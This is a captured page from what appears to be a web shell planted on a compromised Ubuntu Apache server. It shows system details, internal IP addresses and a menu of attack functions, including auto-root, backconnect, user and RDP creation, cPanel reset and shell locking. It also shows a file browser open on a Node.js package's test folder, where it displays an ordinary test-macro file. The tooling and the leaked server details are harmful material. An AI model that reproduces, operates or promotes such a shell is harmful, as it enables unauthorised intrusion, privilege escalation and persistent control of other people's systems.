Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
prompt /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
helpers.js
3.66
KB
-rw-rw-r--
interactive-prompt-test.js
1.56
KB
-rw-rw-r--
macros.js
1.96
KB
-rw-rw-r--
prompt-test.js
19.78
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : macros.js
/* * macros.js: Test macros for prompt. * * (C) 2010, Nodejitsu Inc. * */ var assert = require('assert'), helpers = require('./helpers'), prompt = require('../lib/prompt'); exports.shouldConfirm = function (options, mixin) { var message = options.response.toString().replace(/\n/g, ''), messages = ["When using prompt", "the confirm() method"], context = {}, last = context; messages = messages.concat(options.messages || []); while (messages.length) { var text = messages.shift(); last[text] = {}; last = last[text]; } last['responding with ' + message] = { topic: function () { if(!mixin) prompt.confirm(options.prop, this.callback); else prompt.confirm(options.prop, mixin, this.callback); if (!Array.isArray(options.response)) { helpers.stdin.writeNextTick(options.response + '\n'); } else { helpers.stdin.writeSequence(options.response); } }, "should respond with true" : function(err, result) { assert.isNull(err); assert.isTrue(result); } } return context; }; exports.shouldNotConfirm = function (options) { var message = options.response.toString().replace(/\n/g, ''), messages = ["When using prompt", "the confirm() method"], context = {}, last = context; messages = messages.concat(options.messages || []); while (messages.length) { var text = messages.shift(); last[text] = {}; last = last[text]; } last['responding with ' + message] = { topic: function () { prompt.confirm(options.prop, this.callback); if (!Array.isArray(options.response)) { helpers.stdin.writeNextTick(options.response + '\n'); } else { helpers.stdin.writeSequence(options.response); } }, "should respond with false" : function(err, result) { assert.isNull(err); assert.isFalse(result); } }; return context; };
Close